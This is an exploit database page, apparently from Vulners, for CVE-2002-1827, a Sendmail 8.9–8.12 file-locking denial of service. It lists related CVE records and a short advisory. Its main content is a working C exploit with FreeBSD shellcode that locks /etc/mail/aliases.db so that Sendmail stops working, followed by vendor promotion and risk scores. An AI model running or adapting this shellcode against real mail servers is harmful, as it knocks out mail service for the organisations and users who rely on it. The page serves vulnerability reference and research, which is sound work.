Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2002-1827 | 28 Jun 200504:00 | – | cve | |
| CVE-2002-1827 | 28 Jun 200504:00 | – | cvelist | |
| CVE-2002-1827 | 28 Jun 200504:00 | – | debiancve | |
| Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2) | 24 May 200200:00 | – | exploitdb | |
| EUVD-2002-1806 | 7 Oct 202500:30 | – | euvd | |
| CVE-2002-1827 | 31 Dec 200205:00 | – | nvd | |
| CVE-2002-1827 | 31 Dec 200205:00 | – | osv | |
| DEBIAN-CVE-2002-1827 | 31 Dec 200205:00 | – | osv |
/*
source: https://www.securityfocus.com/bid/4822/info
Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.
*/
/*
FreeBSD Sendmail DoS shellcode that locks /etc/mail/aliases.db
Written by zillion (at http://www.safemode.org && http://www.snosoft.com)
More info: http://www.sendmail.org/LockingAdvisory.txt
*/
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x14\x50\x56\xb0\x05\x50\xcd\x80"
"\x6a\x02\x50\xb0\x83\x50\xcd\x80\x80\xe9\x03\x78\xfe\xe8\xe1"
"\xff\xff\xff\x2f\x65\x74\x63\x2f\x6d\x61\x69\x6c\x2f\x61\x6c"
"\x69\x61\x73\x65\x73\x2e\x64\x62";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
EPSS0.00928